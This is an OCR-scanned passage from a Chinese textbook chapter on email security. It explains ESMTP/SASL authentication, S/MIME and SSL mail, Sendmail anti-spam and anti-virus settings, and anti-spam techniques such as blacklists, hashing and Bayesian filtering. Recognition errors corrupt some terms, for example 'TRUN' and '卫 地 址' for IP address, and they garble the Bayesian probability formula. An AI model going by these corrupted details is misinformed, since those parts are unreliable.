性 ,首先 要 改进 协议 的 安全 性 。ESMTP 是 扩展 的 SMTP 协议 ,是 邮件 服务 器 系统 为 了 限制 
非 本 系统 的 正式 用 户 利用 本 系统 散发 垃圾 邮件 或 其 他 不 当 行为 ,而 设置 的 一 项 安全 认证 服 
务 。 在 ESMTP 服务 器 上 ,发 送 邮 件 需 要 对 用 户 的 身份 进行 验证 。 网 络 中 最 常用 的 认证 方 
法 是 简单 认证 和 安全 层 协议 (SASL) 。 

SASL 作为 网 络 应 用 的 一 个 插件 提供 给 已 有 的 应 用 来 进行 认证 支持 。 网 络 应 用 接收 到 
远程 客户 端 发 来 的 认证 凭证 后 交 给 SASL 层 进行 验证 ,如 果 认 证 通过 ,SASL 返回 一 个 肯定 
的 应 答 ,远程 网 络 用 户 就 可 以 继续 正常 使 用 网 络 应 用 ,如 果 认 证 凭证 遭 到 拒绝 ,SASL 返回 
否定 应 答 ,远程 网 络 用 户 将 被 禁止 使 用 网 络 功能 。 

在 ESMTP 中 使 用 AUTH 命令 来 支持 SASL 认证 。 远 程 客户 端 可 以 使 用 ESMTP 中 
的 AUTH 命令 来 发 送 认 证 凭证 。 

此 外 ,ESMTP 中 用 ETRN 命令 来 代替 标准 SMTP 协议 中 的 TRUN 命令 。 它 通过 一 
个 新 的 SMTP 会 话 ,而 不 是 通过 已 经 存在 的 会 话 传输 数据 ,这 样 ,服务 器 就 可 以 使 用 正常 的 
DNS 域名 解析 方法 同 客户 端 进 行 联系 ,而 不 是 依赖 客户 端 声明 的 身份 ,即使 黑客 建立 了 一 
条 未 授权 的 SMTP 连接 并 发 送 了 ETRN 命令 ,SMTP 服务 器 也 只 会 同 真正 的 客户 端 建立 
连接 并 发 送 邮 件 。 

由 于 电子 邮件 在 网 络 中 是 以 明文 方式 传输 的 ,存在 邮件 内 容 被 泄密 、 修 改 等 安全 问题 。 
传统 的 MIME 协议 只 是 把 非 ASCII 码 数据 编码 为 ASCII 码 数据 ,并 没有 做 到 保密 。 而 要 
实现 邮件 内 容 的 安全 就 必须 对 邮件 内 容 进 行 加 密 。 电 子 邮 件 包括 信 头 和 信 体 ,对 于 邮件 信 
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体 的 安全 问题 ,可 以 使 用 安全 的 MIME 协议 (S/MIME) 对 原始 的 数据 进行 编码 和 加 密 。 
S/MIME 协议 是 在 原来 MIME 协议 的 Multipart 混合 类 型 中 加 入 一 个 子 类 型 Signed ,标志 
一 封 签 过 字 的 邮件 。 这 种 数字 签名 的 方法 允许 发 信人 用 一 个 唯一 的 代码 来 “签发 "邮件 ,其 
他 人 可 以 使 用 公 钥 来 验证 该 代码 ,这样 保证 了 发 信人 不 会 被 伪造 。 为 了 对 邮件 内 容 进行 加 
密 ,S/MIME 协议 创建 了 一 个 pkcs7-MIME 的 应 用 子 类 型 ,通过 使 用 S/MIME-type 标志 的 
参数 来 实现 不 同 的 安全 功能 。 对 于 邮件 信 头 的 安全 性 ,可 以 使 用 SSL SMTP 和 SSL POP， 
在 SSL 所 建立 的 安全 传输 通道 上 运行 SMTP 和 POP3 协议 ,同时 又 对 这 两 种 协议 作 了 一 定 
的 扩展 以 更 好 地 支持 加 密 的 认证 和 传输 。 这 种 模式 要 求 客户 端 、 服 务 器 端的 E-mail 服务 器 
都 支持 ,而 且 都 必须 安装 SSL 证 书 。SSL 是 安全 套 接 字 协 议 ,属于 传输 层 协 议 。 它 允许 网 
络 主机 在 发 送 数据 之 前 将 其 加 密 ,在 接收 端 将 数据 解密 成 正常 格式 ,包括 用 于 为 应 用 程序 提 
供 的 信息 分 段 .压缩 .数据 认证 加密 SSL 记录 协议 和 用 来 交换 版 本 号 、 加 密 算法 、 相 互 身份 
认证 并 交换 密 钥 的 SSL 握手 协议 。 


2. 防 垃圾 邮件 的 方法 


由 于 早期 的 邮件 服务 器 支持 开放 式 转发 , 随 着 非 索要 式 商 业 邮件 的 增多 ,导致 这 类 支持 
开放 式 转 发 的 邮件 服务 器 成 为 中 转 垃圾 邮件 的 帮凶 或 者 本 身 就 成 为 垃圾 邮件 的 受害 者 。 为 
了 提高 邮件 服务 器 的 安全 性 ,阻挡 垃圾 邮件 的 侵害 ,目前 就 邮件 服务 器 本 身 来 说 ,所 采用 的 
方法 有 : 采用 选择 式 转发 , 拒 收 来 自己 知 垃圾 邮件 主机 的 信息 ; 查找 已 知 的 垃圾 邮件 的 记 
号 并 进行 过 滤 ; 采用 SMTP 认证 ; 采用 动态 转发 授权 控制 。 下 面 以 Sendmail 为 例 介绍 如 
何 阻挡 垃圾 邮件 。 

(1) 选择 式 转 发 

Sendmail 通常 使 用 一 个 访问 列表 来 记录 可 以 访问 邮件 服务 器 的 主机 ,格式 如 下 : host 
action。 参 数 host 是 所 希望 控制 的 特定 的 主机 名 、IP 地 址 . 子 网 和 域 地 址 ,参数 action 是 收 
到 host 参数 列 出 的 主机 所 发 来 的 邮件 后 的 响应 动作 ,下 面 是 个 主要 的 主机 响应 动作 : 

。 OK 可 以 向 邮件 服务 器 发 送 邮件 。 

。 RELAY 邮件 服务 器 可 以 转发 邮件 。 

REJECT 邮件 服务 器 不 能 转发 邮件 或 接收 邮件 。 

。 DISCARD 丢弃 远程 主机 发 来 的 邮件 ,不 返回 信息 。 

。 nnn Text 丢弃 远程 主机 发 来 的 邮件 ,返回 错误 信息 。 

(2) 邮件 过 滤 

Sendmail 配置 文件 中 包含 了 对 每 一 封 进入 的 邮件 进行 检查 所 要 用 到 的 规则 ,可 以 制定 
特定 的 规则 ,对 发 送 邮 件 的 头 字 段 以 垃圾 邮件 词语 为 关键 字 进 行 扫描 ,并 将 其 过 滤 出 去 。 首 
先 , 要 建立 一 个 包含 在 邮件 Subject 字段 中 可 以 找到 的 垃圾 邮件 词语 的 文件 ,如 : /etc/mail/ 
bad_Subjects 每 行为 一 个 词 条 , 当 邮 件 服务 器 收 到 垃圾 邮件 后 ,可 以 向 该 文件 添加 新 的 词 
语 , 有 了 词 条 文件 后 ,必须 在 Sendmail. cf 中 创建 规则 集 并 加 入 对 头 字 段 进行 垃圾 邮件 词语 
的 检查 。 这 样 , 当 邮件 服务 器 确定 任何 邮件 的 Subject 头 字段 中 如 有 与 bad_Subjects 文件 
中 的 词语 相 匹 配 的 邮件 则 将 被 拒绝 ,并 返回 一 个 错误 。 

(3) 采用 SMTP 认证 

邮件 服务 器 只 转发 或 接收 通过 安全 认证 的 用 户 所 发 的 邮件 。 
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(4) 动态 转发 授权 控制 机 制 (Dynamic Relay Authorization Control, DRAC) 

这 是 一 个 运行 在 后 台 的 Daemon(Internet 中 用 于 邮件 收发 的 后 台 程 序 ) ,可 以 动态 地 更 
新 Sendmail 的 Relay 授权 ,利用 POP3 或 IMAP 服务 器 固有 的 功能 来 获取 用 户 名 、 密 码 和 
客户 端 IP 地 址 等 信息 ,并 将 这 些 信息 及 时 映像 到 验证 数据 库 中 , 供 SMTP 服务 器 调用 , 同 
时 ,在 经 过 一 段 时 间 以 后 ,其 验证 信息 将 自动 失效 ,需要 用 户 重新 输入 验证 信息 。 这 样 ,不 仅 
可 以 保证 合法 的 POP3 或 IMAP 用 户 能 够 正常 使 用 邮件 服务 器 ,也 可 以 阻止 任何 非 注册 用 
户 利用 邮件 服务 器 来 发 送 邮 件 。 这 种 邮件 安全 控制 常常 被 称 为 “邮件 服务 之 前 的 POP 验 
证 ”(POP-before-SMTP)，。 

除了 对 Sendmail 服务 器 本 身 进行 合理 配置 以 提高 安全 性 以 外 ,还 可 以 通过 建立 独立 的 
邮件 防火 墙 来 避免 内 部 的 邮件 服务 器 受 邮 件 炸 弹 的 攻击 ,并 同时 可 过 滤 垃圾 邮件 。 邮 件 防 
火 墙 可 以 将 互联 网 发 给 本 地 域 的 邮件 转发 到 内 部 的 邮件 服务 器 ,同时 内 部 用 户 通过 内 部 邮 
件 服务 器 外 发 的 邮件 也 必须 经 过 邮件 防火 墙 转发 ,因为 邮件 服务 器 在 内 网 中 ,所 以 即使 邮件 
防火 墙 失效 黑客 仍然 不 能 访问 用 户 的 邮箱 。 邮 件 防 火 墙 可 以 设置 在 位 于 网 络 防火 墙 内 、 
DMZ( 停 火 区 ) 内 或 是 作为 内 部 的 邮件 防火 墙 服务 器 ,但 是 不 管 在 哪里 ,都 必须 使 用 一 个 虚 
拟 用 户 列表 来 完成 本 地 域 的 邮件 地 址 到 内 部 的 邮件 服务 器 的 映射 ,同时 内 部 的 邮件 服务 器 
必须 配置 成 使 用 邮件 防火 墙 作为 转发 主机 。 更 为 详细 的 反 垃 圾 邮件 技术 参见 9. 4 节 的 
内 容 。 


3. 拒绝 病毒 邮件 的 方法 


电子 邮件 是 传播 病毒 最 常用 的 手段 之 一 。 病 毒 邮件 的 制造 者 通常 在 邮件 的 附件 中 携带 
病毒 ,并 且 赋 予 邮件 一 个 特定 的 主题 ,针对 这 种 情况 ,目前 阻止 病毒 邮件 通过 邮件 服务 器 进 
行 传播 的 方法 主要 有 两 大 类 : 邮件 过 滤 和 病毒 扫描 。 

邮件 过 滤 主 要 是 基于 特定 短语 和 特定 邮件 附件 类 型 ,用户 可 以 设置 Sendmail 的 配置 文 
件 , 对 邮件 的 Subject 字段 进行 过 滤 ,阻止 那些 在 Subject 字段 中 出 现 已 知 病毒 短语 的 邮件 
通过 邮件 服务 器 。 由 于 携带 病毒 的 附件 通常 是 一 些 可 执行 文件 或 脚本 文件 ,因此 同样 可 以 
对 MIME Content-Type 和 Content-Disposition 字段 里 的 文件 类 型 进行 过 滤 。 这 种 通过 邮 
件 过 滤 来 阻挡 病毒 邮件 的 方法 和 基于 特定 短语 的 垃圾 邮件 过 滤 技术 相同 。 因 为 过 滤 所 有 特 
定 文件 类 型 附件 的 邮件 危险 性 很 大 ,用 户 可 以 用 邮件 扫描 的 方法 来 代替 。 

邮件 扫描 主要 是 对 邮件 附件 进行 扫描 , 它 首先 判断 并 提取 出 MIME 或 未 编码 的 二 进 制 
文档 ,然后 进行 扫描 ,寻找 已 知 的 病毒 ,如 果 没 有 发 现 病毒 则 让 邮件 正常 发 送 。 要 想 使 邮件 
服务 器 具有 病毒 扫描 功能 ,必须 要 有 用 于 发 现 和 取出 信件 中 的 二 进 制 文档 附件 的 软件 ,如 
Amavis, 用 于 扫描 附件 文件 是 否 携带 病毒 的 软件 ,如 CA Inoculate IT。 在 正确 安装 了 这 两 
类 软件 后 必须 重新 设置 Sendmail 的 配置 文件 使 邮件 服务 器 在 接收 到 所 有 发 给 本 地 用 户 的 
邮件 时 将 它们 交 给 Amavis, 由 Amavis 对 附件 进行 扫描 ,把 通过 病毒 扫描 的 邮件 交 给 常规 
本 地 邮寄 者 以 发 送 给 本 地 用 户 。 

一 个 好 的 电子 邮件 防 病毒 体系 ,除了 包括 在 邮件 服务 器 上 将 防 病 毒 软件 和 邮件 传输 机 
制 有 机 地 结合 起 来 ,还 包括 在 客户 端 安装 有 效 防 病毒 软件 和 建立 隔离 内 、 外 部 网 络 的 病毒 网 
关 , 来 对 外 部 网 络 中 的 病毒 进行 隔离 。 目 前 :客户 端 使 用 的 邮件 病毒 防护 软件 所 采用 的 技术 
主要 有 : 邮件 蔡 入 式 技术 病毒 隔 离 技术 、 双 引擎 杀毒 技术 和 比特 动态 滤 毒 技术 。 但 是 采用 
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这 种 方法 的 缺点 是 它 只 能 杀 除 本 地 硬盘 上 受 病毒 感染 的 文件 ,真正 的 病毒 源 (位 于 邮件 服务 
器 上 ) 并 没有 得 到 及 时 处 理 , 如 果 服 务 器 没有 受到 保护 ,可 能 会 使 整个 企业 内 部 网 络 受到 病 
毒 的 攻击 ,而 且 安 装 在 PC 机 上 的 防 病毒 软件 需要 各 自 不 断 的 升级 ,这 必然 会 浪费 大 量 的 时 
间 和 资源 。 除 了 配置 邮件 服务 器 过 滤 扫描 病毒 以 外 ,还 可 以 使 用 病毒 防火 墙 。 

邮件 病毒 的 搜索 引擎 软件 安装 在 专用 的 病毒 防火 墙 上 ,为 实现 检测 的 功能 ,防火 墙 须 在 
TCP 端口 25 实时 监测 通过 防火 墙 的 SMTP 数据 流 ,接收 所 有 的 SMTP 报 文 ,检测 这 些 邮 
件 是 否 有 病毒 ,并 转发 这 些 邮 件 到 邮件 的 目的 服务 器 。 通 过 设置 邮件 病毒 防火 墙 、 邮 件 服务 
器 端 病毒 过 滤 、 客 户 端 病毒 扫描 三 级 防护 ,可 以 有 效 地 防止 通过 电子 邮件 在 互联 网 上 传播 
病毒 。 

总 之 ,在 互联 网 高 速 发 展 的 今天 ,电子 邮件 应 用 越 来 越 广泛 ,如 何 保证 电子 邮件 在 传输 
过 程 中 的 安全 ,抵制 垃圾 邮件 和 病毒 邮件 已 经 成 为 一 个 刻不容缓 的 问题 。 


9.4 反 垃 圾 邮件 技术 解析 


电子 邮件 是 最 常用 的 网 络 应 用 之 一 ,已 经 成 为 网 络 交流 沟通 的 重要 途径 。 但 是 垃圾 邮 
件 烦 恼 着 大 多 数 人 ,近来 的 调查 显示 ,93% 的 被 调查 者 都 对 接收 到 的 大 量 垃 圾 邮件 非常 不 
满 。 日 益 增 加 的 垃圾 邮件 会 造成 一 年 94 亿美 元 的 损失 (来 自 ChinaByte 上 一 则 新 闻 的 数 
据 ), 有 一 些 文章 表明 ,垃圾 邮件 可 能 会 花费 一 个 公司 内 每 个 用 户 的 600 一 1000 美元 。 

一 方面 ,垃圾 邮件 随 着 互联 网 的 不 断 发 展 而 大 量 增长 ,最 初 的 垃圾 邮件 主要 是 一 些 商 业 
宣传 电子 邮件 ,而 现在 更 多 是 的 有 关 色 情 、 政 治 的 垃圾 邮件 ,甚至 达到 了 垃圾 邮件 总 量 的 
40% 左 右 , 并 且 仍 然 有 持续 增长 的 趋势 。 另 一 方面 ,垃圾 邮件 成 了 计算 机 病毒 新 的 、 快 速 的 
传播 途径 。 

目前 ,世界 上 50% 的 邮件 都 是 垃圾 邮件 ,很 多 厂商 设置 的 反 垃圾 邮件 措施 都 没有 在 部 
署 服务 器 时 实施 ,即使 实施 了 也 不 能 完全 阻止 垃圾 邮件 ,同时 还 会 对 正常 的 邮件 来 往 产 生 
影响 。 


94.1 什么 是 垃圾 邮件 


某 种 程度 上 ,对 垃圾 邮件 的 定义 可 以 是 那些 人 们 没有 意愿 去 接收 的 电子 邮件 。 下 面 介 
绍 几 种 比较 常见 的 垃圾 邮件 。 

@ 商业 广告 : 很 多 公司 为 了 宣传 新 的 产品 新 的 活动 等 通过 电子 邮件 的 方式 进行 的 
宣传 。 

四 政治 言论 : 目前 收 到 不 少 其 他 国家 或 者 反动 组 织 发 送 的 这 类 电子 邮件 ,这 就 和 垃圾 
商业 广告 一 样 , 销 售 和 贩卖 他 们 的 所 谓 言论 。 

@ 蠕虫 病毒 邮件 : 越 来 越 多 的 病毒 通过 电子 邮件 来 迅速 传播 ,这 也 的 确 是 一 条 迅速 而 
且 有 效 的 传播 途径 。 

@ 恶意 邮件 : 恺 吓 ,欺骗 性 邮件 ,比如 Phishing, 这 是 一 种 假冒 网 页 的 电子 邮件 ,来 骗取 
用 户 的 个 人 信息 、 账 号 甚至 信用 卡 。 

普通 个 人 的 电子 邮箱 成 为 垃圾 邮件 的 目标 的 原因 很 多 ,如 在 网 站 ,论坛 注册 了 邮件 地 
址 ,在 朋友 的 邮箱 中 找到 了 用 户 的 电子 邮箱 ,对 邮件 提供 商 进行 用 户 枚 举 等 。 通 常情 况 下 ， 
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越 少 暴露 电子 邮件 地 址 ,接收 到 垃圾 邮件 也 就 越 少 ,使 用 的 时 间 越 短 就 越 少 接收 到 垃圾 
邮件 。 


942 安全 问题 


垃圾 邮件 给 互联 网 以 及 广大 使 用 者 带 来 了 很 大 的 影响 ,这 种 影响 不 仅仅 是 人 们 需要 花 
费时 间 来 处 理 垃圾 邮件 ,垃圾 邮件 占用 系统 资源 等 ,同时 也 带 来 了 很 多 的 安全 问题 。 

垃圾 邮件 占用 了 大 量 网 络 资源 ,这 是 显而易见 的 。 有 的 邮件 服务 器 因为 安全 性 差 , 被 作 
为 垃圾 邮件 转发 站 ,因此 而 被 警告 被 查封 IP 的 事件 时 有 发 生 , 大 量 消耗 的 网 络 资源 使 得 正 
常 的 业务 运作 变 得 缓慢 。 随 着 国际 上 反 垃 圾 邮件 的 发 展 , 组 织 间 黑 名 单 共享 ,使 得 无 束 服 务 
器 被 更 大 范围 屏蔽 ,这 无 疑 会 给 正常 用 户 的 使 用 造成 严重 影响 。 

垃圾 邮件 和 黑客 攻击 .病毒 的 结合 也 越 来 越 密切 。 随 着 垃圾 邮件 的 演变 ,用 恶意 代码 或 
监视 软件 等 来 作为 垃圾 邮件 的 现象 已 经 明显 地 增多 了 。 在 2003 年 12 月 31 日 ,巴西 的 一 个 
黑客 组 织 把 包含 恶意 JavaScript 脚本 的 垃圾 邮件 发 送 给 了 数 百 万 用 户 , 那 些 通过 Hotmail 
来 浏览 这 些 垃圾 邮件 的 人 们 已 经 在 不 知 不 觉 中 泄露 了 自己 的 账号 。 

越 来 越 多 的 具有 欺骗 性 的 病毒 邮件 ,让 很 多 企业 深 受 其 害 , 即 便 采 取 了 很 好 的 网 络 保护 
策略 ,依然 很 难 避 免 , 越 来 越 多 的 安全 事件 也 都 是 因为 这 些 病毒 邮件 产生 的 ,这 些 病 毒 邮件 
可 能 是 病毒 ,木马 或 者 其 他 恶意 程序 。Phishing 的 假冒 诡计 对 于 普通 使 用 者 来 说 的 确 很 难 
做 出 正确 的 判断 ,但 是 造成 的 损失 却 是 很 直接 的 。 
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垃圾 邮件 的 危害 现在 已 经 深入 人 心 , 反 垃圾 邮件 也 取得 了 越 来 越 多 的 成 果 , 例 如 Scott 
Richter 向 Microsoft 公司 赔款 700 万 美元 。 不 少 国家 也 在 为 反 垃 圾 邮件 进行 立法 ,以 便 能 
够 得 到 法 律 上 的 支持 。 

当前 的 反 垃 圾 邮件 技术 可 以 分 为 四 大 类 : 过 滤器 (Filter)、 反 向 查询 (Reverse 
Lookup) .挑战 (Challenges) 和 密码 术 (Cryptography) ,这 些 反 垃 圾 邮件 技术 都 可 以 减少 垃 
圾 邮件 的 数量 ,但 是 也 都 有 它们 的 局 限 性 。 下 面 将 讨论 这 些 技术 以 及 一 些 主要 技术 的 实现 。 


1. 过 滤 


过 滤 (filter) 是 一 种 相对 来 说 最 比较 简单 但 却 很 直接 的 垃圾 邮件 处 理 技术 。 这 种 技术 
主要 用 于 接收 系统 (MUA, 如 Outlook Express 或 者 MTA, 如 Sendmail) 来 辨别 和 处 理 垃圾 
邮件 。 从 应 用 情况 来 看 ,这 种 技术 的 使 用 也 是 最 广泛 的 ,比如 很 多 邮件 服务 器 上 的 反 垃圾 邮 
件 插件 \ 反 垃圾 邮件 网 关 和 客户 端 上 的 反 垃 圾 邮件 功能 等 ,都 是 采用 的 过 滤 技 术 。 

(1) 关键 词 过 滤 

关键 词 过 滤 技 术 通 常 创 建 一 些 简单 或 复杂 的 与 垃圾 邮件 关联 的 单词 表 来 识别 和 处 理 垃 
圾 邮件 。 如 某 些 关键 词 大 量 出 现在 垃圾 邮件 中 ,又 如 一 些 病毒 的 邮件 标题 。 这 种 方式 比较 
类 似 于 反 病 毒 软 件 利用 病毒 特征 过 滤 。 可 以 说 这 是 一 种 简单 的 内 容 过 滤 方 式 , 它 的 基础 是 
必须 创建 一 个 庞大 的 过 滤 关 键 词 列表 。 

这 种 技术 的 缺陷 很 明显 , 即 过 滤 的 能 力 与 关键 词 有 很 大 关系 ,关键 词 列表 造成 错 报 的 可 
能 性 也 比较 大 ,系统 采用 这 种 技术 来 处 理 邮 件 的 时 候 , 所 消耗 的 系统 资源 也 会 比较 多 。 而 一 
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般 躲 避 关 键 词 的 技术 比如 拆 词 .组 词 等 都 很 容易 绕 过 过 滤 。 

(2) 黑白 名 单 

黑 名 单 (Black Lisb 和 白 名 单 (White Lisb ,分 别 是 已 知 的 垃圾 邮件 发 送 者 和 可 信任 的 
发 送 者 的 卫 地 址 和 邮件 地 址 。 现 在 ,有 很 多 组 织 将 那些 经 常 发 送 垃圾 邮件 的 卫 地 址 ( 甚 
至 JP 地址 范围 ) 收 集 在 一 起 ,做 成 Black List, 如 Spamhaus 的 SBL(Spamhaus Black List) ， 
一 个 BL 可 以 在 很 大 范围 内 共享 。 许 多 ISP 正在 采用 一 些 组 织 的 BL 来 阻止 接收 垃圾 
邮件 。 

白 名 单 则 与 黑 名 单 相 反 , 对 于 那些 信任 的 邮件 地 址 或 者 IP 就 完全 接收 了 。 

目前 很 多 邮件 接收 端 都 采用 了 黑白 名 单 的 方式 来 处 理 垃圾 邮件 ,包括 MUA 和 MTA， 
当然 在 MTA 中 使 用 得 更 广泛 ,这样 可 以 有 效 地 减少 服务 器 的 负担 。 

BL 技术 也 存在 明显 的 缺陷 ,因为 Black List 中 不 能 包含 所 有 的 (即便 是 大 量 ) 的 IP 地 
址 ,而 且 垃 圾 邮件 发 送 者 很 容易 通过 不 同 的 IP 地 址 来 制造 垃圾 。 

(3) HASH 技术 

HASH 技术 是 邮件 系统 通过 创建 HASH 来 描述 邮件 内 容 , 比 如 将 邮件 的 内 容 、 发 件 人 
等 作为 参数 ,最 后 计算 得 出 这 个 邮件 的 HASH 来 描述 这 个 邮件 。 如 果 HASH 相同 ,那么 说 
明 邮 件 内 容 、 发 件 人 等 信息 与 原始 信息 一 致 。 这 些 技 术 已 被 一 些 ISP 采 用, 如果 出 现 重 复 的 
HASH 值 ,那么 就 可 以 怀疑 是 大 批量 发 送 邮 件 了 。 

(4) 基于 规则 的 过 滤 

这 种 过 滤 根 据 某 些 特征 (如 单词 ` 词 组, 位置. 大 小 和 附件 等 ) 来 形成 规则 ,通过 这 些 规则 
来 描述 垃圾 邮件 ,就 好 比 在 IDS( 入 侵 检测 系统 ) 中 描述 一 个 入 侵 事 件 一 样 。 要 使 过 滤器 有 
效 , 管 理 人 员 就 必须 要 维护 一 个 庞大 的 规则 库 。 

(5) 智能 和 概率 系统 

广泛 使 用 的 是 贝 叶 斯 (Bayesian) 算 法 ,可 以 学 习 单词 的 频率 和 模式 ,这 样 可 以 同 垃圾 邮 
件 和 正常 邮件 关联 起 来 进行 判断 。 这 是 一 种 相对 于 关键 词 来 说 ,更 复杂 和 更 智能 化 的 内 容 
过 滤 技 术 。 下 面 将 详细 介绍 这 种 在 客户 端 和 服务 器 中 使 用 的 最 广泛 的 技术 。 

在 过 滤器 中 ,最 好 的 应 该 是 基于 评分 (score) 的 过 滤器 ,评分 系统 过 滤器 是 一 种 最 基本 
的 算法 过 滤器 ,也 是 贝 叶 斯 算法 的 基本 雏形 。 它 的 原理 就 是 检查 垃圾 邮件 中 的 词 或 字符 ,将 
每 个 特征 元 素 ( 最 简单 的 元 素 就 是 单词 ,复杂 点 的 元 素 就 是 短语 ) 都 给 出 一 个 分 数 ( 正 分 数 )， 
另 一 方面 就 是 检查 正常 邮件 的 特征 元 素 , 用 来 降低 得 分 ( 负 分 数 )。 最 后 邮件 整体 就 得 到 一 
个 垃圾 邮件 总 分 ,通过 这 个 分 数 来 判断 是 否 为 垃圾 邮件 。 

这 种 评分 过 滤器 实现 了 自动 识别 垃圾 邮件 的 功能 ,但 是 依然 存在 下 面 一 些 不 适应 的 
问题 。 

@ 特征 元 素 列表 通过 垃圾 邮件 或 者 正常 邮件 获得 。 因 此 ,要 提高 识别 垃圾 邮件 的 方 
法 ,就 要 从 数 百 封 邮件 中 学 习 , 这 就 降低 了 过 滤器 效率 ,因为 对 于 不 同 的 人 来 说 ,正常 邮件 的 
特征 元 素 是 不 一 样 的 。 

@ 获得 特征 元 素 分 析 的 邮件 数量 多 少 是 一 个 关键 。 如 果 垃 圾 邮件 发 送 者 也 适应 了 这 
些 特征 ,就 可 能 会 让 垃圾 邮件 更 像 正 常 邮 件 。 这 样 过 滤 特 征 就 要 更 改 。 

@ 每 个 词 计算 的 分 数 应 该 基于 一 种 很 好 的 评价 ,但 是 还 是 有 随意 性 。 如 特征 就 可 能 不 
会 适应 垃圾 邮件 的 单词 变化 ,也 不 会 适应 某 个 用 户 的 需求 。 
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贝 叶 斯 理论 在 计算 机 行业 中 应 用 相当 广泛 ,这 是 一 种 对 事物 的 不 确定 性 描述 ,比如 
Google 计算 中 就 采用 了 贝 叶 斯 理论 。 贝 叶 斯 算法 的 过 滤器 就 是 计算 邮件 内 容 中 成 为 垃圾 
邮件 的 概率 ,首先 它 要 从 许多 垃圾 邮件 和 正常 邮件 中 学 习 , 因 此 ,效果 将 比 普通 的 内 容 过 滤 
器 更 优秀 , 错 报 也 会 更 少 。 贝 叶 斯 过 滤器 也 是 一 种 基于 评分 的 过 滤器 。 但 这 不 仅仅 是 一 种 
简单 的 计算 分 数 ,而 更 从 根本 上 来 识别 邮件 。 它 采用 自动 建立 特征 表 的 方式 ,首先 分 析 大 量 
的 垃圾 邮件 和 正常 邮件 ,算法 分 析 邮 件 中 多 种 特征 出 现 的 概率 。 贝 叶 斯 算法 计算 特征 的 来 
源 通常 是 下 面 几 种 。 

。 邮件 正文 中 的 单词 。 

。 邮件 头 ( 发 送 者 、 传 递 路 径 等 ) 。 

。 其 他 表现 ,如 HTML 编码 (如 颜色 等 ) 。 

。 词组 ,短语 。 

。 META 信息 ,如 特殊 短语 出 现 位 置 等 。 

例如 ,正常 邮件 中 经 常 出 现 单词 AAA ,但 是 在 垃圾 邮件 中 基本 不 出 现 ,那么 AAA 标志 
垃圾 邮件 的 概率 就 接近 0, 反之 则 不 然 。 

贝 叶 斯 算法 的 步骤 如 下 : 

g@ 收集 大 量 的 垃圾 邮件 和 非 垃圾 邮件 ,建立 垃圾 邮件 集 和 非 垃圾 邮件 集 。 

@ 提取 特征 来 源 中 的 独立 字符 串 , 例 如 ,AAA 作为 TOKEN 串 , 并 统计 提取 出 的 
TOKEN 串 出 现 的 次 数 即 字 频 。 按 照 上 述 的 方法 分 别处 理 垃圾 邮件 集 和 非 垃圾 邮件 集中 的 
所 有 邮件 。 

@ 每 一 个 邮件 集 对 应 一 个 哈 希 表 ,hashtable_good 对 应 非 垃圾 邮件 集 而 hashtable_bad 
对 应 垃圾 邮件 集 。 表 中 存储 TOKEN 串 到 字 频 的 映射 关系 。 

@ 计算 每 个 哈 希 表 中 TOKEN 串 出 现 的 概率 P= ( 某 TOKEN 串 的 字 频 )/( 对 应 哈 希 
表 的 长 度 ) 。 

@@ 综合 考虑 hashtable_good 和 hashtable_bad ,推断 出 当 新 接收 的 邮件 中 出 现 某 个 
TOKEN 串 时 ,该 新 邮件 为 垃圾 邮件 的 概率 。 

@ 建立 新 的 哈 希 表 hashtable_probability 存储 TOKEN 串 ti 到 P(A|t) 的 映射 。 

@ 根据 建立 的 哈 希 表 hashtable_probability 可 以 估计 一 封 新 接收 的 邮件 为 垃圾 邮件 的 
可 能 性 。 

当 新 接收 到 一 封 邮件 时 ,按照 步 又 加 ,生成 TOKEN 串 。 查 询 hashtable_probability 得 
到 该 TOKEN 串 的 键 值 。 假 设 由 该 邮件 共 得 到 N 个 TOKEN 串 ,t1,t2,…,tn,hashtable_ 
probability 中 对 应 的 值 为 P1,P2,…,PN,P(CAltl,t2,t3,…',tn) 表 示 当 在 邮件 中 同时 出 现 
多 个 TOKEN 串 tl,t2,…:tn 时 ,该 邮件 为 垃圾 邮件 的 概率 。 

由 复合 概率 公式 可 得 : P(Altl,t2,t3,…,tn) 一 (P1 * P2 *…* PN)/[Pl * P2* …x 了 PN 十 
(1 一 P1) * (1 一 P2) x … x (1 一 PN)], 当 P(A|tl,t2,t3,…,tn) 超 过 预定 阅 值 时 ,就 可 以 判 
断 邮 件 为 垃圾 邮件 。 

在 新 邮件 到 达 的 时 候 ,就 通过 贝 叶 斯 过 滤器 分 析 , 通 过 使 用 各 个 特征 来 计算 邮件 是 垃圾 
的 概率 。 通 过 不 断 的 分 析 , 过 滤器 也 不 断 地 获得 自我 更 新 。 如 通过 各 种 特征 判断 一 个 包含 
单词 AAA 的 邮件 是 垃圾 ,那么 单词 AAA 成 为 垃圾 邮件 特征 的 概率 就 增加 了 。 

这 样 , 贝 叶 斯 过 滤器 就 有 了 自 适 应 能 力 , 既 可 以 自动 进行 ,也 可 以 用 户 手工 操作 ,更 能 适 
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应 单个 用 户 的 使 用 。 而 垃圾 邮件 发 送 者 要 获得 这 样 的 适应 能 力 就 比较 困难 ,因此 ,很 难 逃 避 
过 滤器 的 过 滤 ,除非 垃圾 邮件 发 送 者 能 对 某 个 人 的 过 滤器 进行 判断 ,例如 ,采用 发 送 回执 的 
办 法 来 了 解 哪些 邮件 被 用 户 打 开 了 ,这 样 他 们 就 可 以 适应 过 滤器 了 。 

实践 证 明 , 贝 叶 斯 过 滤器 在 客户 端 和 服务 器 中 效果 是 非常 明显 的 ,优秀 的 贝 叶 斯 过 滤器 
能 够 识别 99. 9% 的 垃圾 邮件 。 目 前 大 多 数 反 垃圾 邮件 产品 都 采用 了 这 样 的 技术 ,如 
Foxmail 中 的 贝 叶 斯 过 滤 。 

(6) 局 限 性 和 缺点 

目前 很 多 采用 过 滤器 技术 的 反 垃 圾 邮件 产品 通常 都 采用 了 多 种 过 滤器 技术 ,以 便 使 产 
品 更 为 有 效 。 过 滤器 通过 误 报 和 漏 报 来 区 分 等 级 。 漏 报 就 是 指 垃圾 邮件 绕 过 了 过 滤器 的 过 
滤 。 而 误 报 则 是 将 正常 的 邮件 判断 为 了 垃圾 邮件 。 完 美的 过 滤器 系统 应 该 是 不 存在 漏 报 和 
误 报 的 ,但 这 只 是 理想 情况 。 

一 些 基 于 过 滤器 原理 的 反 垃圾 邮件 系统 通常 有 下 面 的 三 种 局 限 性 。 

Q@ 可 能 被 绕 过 : 垃圾 邮件 发 送 者 和 所 用 的 发 送 工具 也 不 是 静态 的 ,也 会 很 快 适应 过 滤 
